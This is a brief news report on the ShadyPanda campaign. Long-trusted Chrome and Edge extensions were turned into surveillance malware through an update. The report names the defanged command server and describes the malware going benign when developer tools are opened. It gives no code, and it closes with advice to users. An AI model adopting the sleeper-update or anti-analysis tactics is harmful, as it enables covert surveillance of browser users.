Sleeper Apps Awakened
A deceptive operation known as ShadyPanda quietly operated for years, distributing seemingly harmless applications across both the Chrome Web Store and the Edge marketplace. Some of these applications even achieved ‘Featured’ and ‘Verified’ status, accumulating millions of downloads and positive reviews. The group behind ShadyPanda diligently maintained these apps, providing updates as new browser versions were released and bugs were identified.
This extensive groundwork, however, was a prelude to a malicious activation. A recent update transformed these trusted applications into potent malware. Once updated, the apps began extensive surveillance, “checking api.extensionplay[.]com for new instructions every hour, downloading arbitrary JavaScript, and executing it with full browser API access. It can also inject malicious content into any website, including HTTPS connections.” This allowed the attackers to monitor browsing activity in real-time or gather logs for later upload.
The malware incorporated a clever evasion technique: if a user opened development tools, the applications would revert to their benign versions, avoiding detection. While Chrome’s update review process quickly identified the malicious activity, leading to the removal of the apps, some systems were infected. The applications remained available on the Edge Add-on store until recently.
Users who have noticed the sudden disappearance of a previously installed browser application should consider performing a thorough scan of their system.
